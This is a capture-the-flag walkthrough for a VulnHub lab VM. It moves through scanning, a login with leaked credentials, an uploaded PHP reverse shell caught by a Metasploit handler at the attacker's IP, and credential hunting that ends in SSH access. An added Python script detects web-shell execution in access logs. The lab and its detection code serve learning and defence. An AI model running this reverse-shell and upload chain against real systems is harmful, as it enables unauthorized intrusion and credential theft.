Link to the VirtualBox download: https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/
Goal: 5 flags
Step 1: Loading my Kali and the CTF on VirtualBox.
I chose to put both on their own subnet.
Kali IP: 192.168.56.102
Step 2: Discovering CTF IP
netdiscover
CTF IP is 192.168.56.101
Step 3: Enumerating with nmap
nmap -Pn -p- -sV 192.168.56.101
Open ports:
22 ssh
80 http
Step 4: Scanning the web server
dirb http://192.168.56.101
Lots of files and directories there; let’s explore them one by one…
Step 5: Exploring /admin_area/
This is the page:
And the source shows:
That’s the second flag – so I’ve probably missed something even more obvious and right in my face!
Flag: 7412574125871236547895214
Found: #2
Looking for: #1, #3, #4, and #5
and there’s the admin username and password: 3v1l_H@ck3r
We’ll make a note of that and return to it in time…
Step 6: Exploring /flag/
Yes, I probably should have come here first – it is called “flag” !
Flag: 8734509128730458630012095
Found: #1, #2
Looking for: #3, #4, and #5
Step 7: Exploring /robots.txt/
I systematically tried loading each file – but nothing new showed up.
Step 8: Exploring /index.php
It redirects to /login.php
And yes, we can login with the creds found in Step 5
username: admin
password: 3v1l_H@ck3r
and we’re in-
The Browse button allows for an upload of any type of file, so let’s attempt to upload a php reverse shell, shall we?
Step 9: Uploading a php reverse shell
The Kali box has web shells stored in:
/usr/share/webshells
I changed the IP and port in the php-reverse-shell.php file:
And uploaded it successfully.
Step 10: Exploitation – firing up Metasploit
use multi/handler
set payload linux/x86/shell/reverse_tcp
set LHOST 192.168.56.102
set LPORT 55555
exploit
and browsing to /uploaded_files/php-reverse-shell.php
and yes, Metasploit gave us a shell!
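From the defender’s side, the upload in Step 9 and the browse in Step 10 leave a recognisable trace in the web server’s access log: a POST from one client, followed by a GET for a .php file under /uploaded_files/. The script below is an added example (not part of the original write-up) that flags that pattern; the upload directory name comes from this page, and the Apache combined-format log lines are constructed for the demo.

```python
import re
from collections import defaultdict

# Constructed sample access log (Apache combined format); not real traffic from the CTF box.
SAMPLE_LOG = """\
192.168.56.102 - - [10/Mar/2019:12:01:05 +0000] "GET /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Mar/2019:12:01:20 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Mar/2019:12:02:10 +0000] "POST /index.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Mar/2019:12:02:31 +0000] "GET /uploaded_files/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.1 - - [10/Mar/2019:12:05:00 +0000] "GET /uploaded_files/photo.jpg HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
"""

# Minimal parser for the fields we need: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

UPLOAD_DIR = "/uploaded_files/"          # upload directory seen on this box
EXEC_EXT = (".php", ".phtml", ".php5", ".phar")  # extensions the web server would execute


def find_webshell_requests(log_text):
    """Return one alert per request that executes a server-side script from the
    upload directory, noting whether the same client had an earlier POST
    (a likely upload) in the log."""
    posted = defaultdict(bool)
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse (truncated, other format)
        ip, method = m["ip"], m["method"]
        path = m["path"].split("?", 1)[0]  # drop the query string
        if method == "POST":
            posted[ip] = True
        if path.startswith(UPLOAD_DIR) and path.lower().endswith(EXEC_EXT):
            alerts.append({"ip": ip, "ts": m["ts"], "path": path,
                           "status": int(m["status"]), "prior_post": posted[ip]})
    return alerts


if __name__ == "__main__":
    for a in find_webshell_requests(SAMPLE_LOG):
        print(f"[ALERT] {a['ts']} {a['ip']} executed {a['path']} "
              f"(status {a['status']}, earlier upload: {a['prior_post']})")
```

A static image such as photo.jpg in the same directory is not flagged; only executable extensions under the upload path trigger an alert.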
Lots of cd and ls commands, and finally:
cat flag.txt doesn’t work
But cat hint.txt does!
We have our third flag:
Flag: 7645110034526579012345670
Found: #1, #2, #3
Looking for: #4 and #5
and we have a hint:
“Try to find user technawi password to read the flag.txt file, you can find it in a hidden file 😉”
Step 10b: Grep
After a lot of trial and error with grep, using the hint to look for technawi’s hidden file, I hit gold with:
$ find / -user technawi -type f 2>&1 | grep -v "Permission" | grep -v "No such"
Step 11: Inspecting /etc/mysql/cpnf.d/crendentials.txt
cat /etc/mysql/cpnf.d/crendentials.txt
Our fourth flag:
Flag: 7845658974123568974185412
Found: #1, #2, #3, #4
Looking for: #5
and the credentials to open flag.txt, which presumably holds the fifth and last flag:
username: technawi
password: 3vilH@ksor
Step 12: SSH as technawi
Step 3 had shown us the port 22 – SSH was open.
ssh technawi@192.168.56.101
password: 3vilH@ksor
lets us in!
Step 13: Inspecting /var/www/html/flag.txt
cat /var/www/html/flag.txt
And yes, our fifth and final flag:
Flag: 5473215946785213456975249
Found: #1, #2, #3, #4, #5
All done!
If there’s one thing this CTF taught me => I definitely need to brush up on my grep!
Tools and commands used:
- nmap
- dirb
- php reverse shell
- metasploit
- grep
- ssh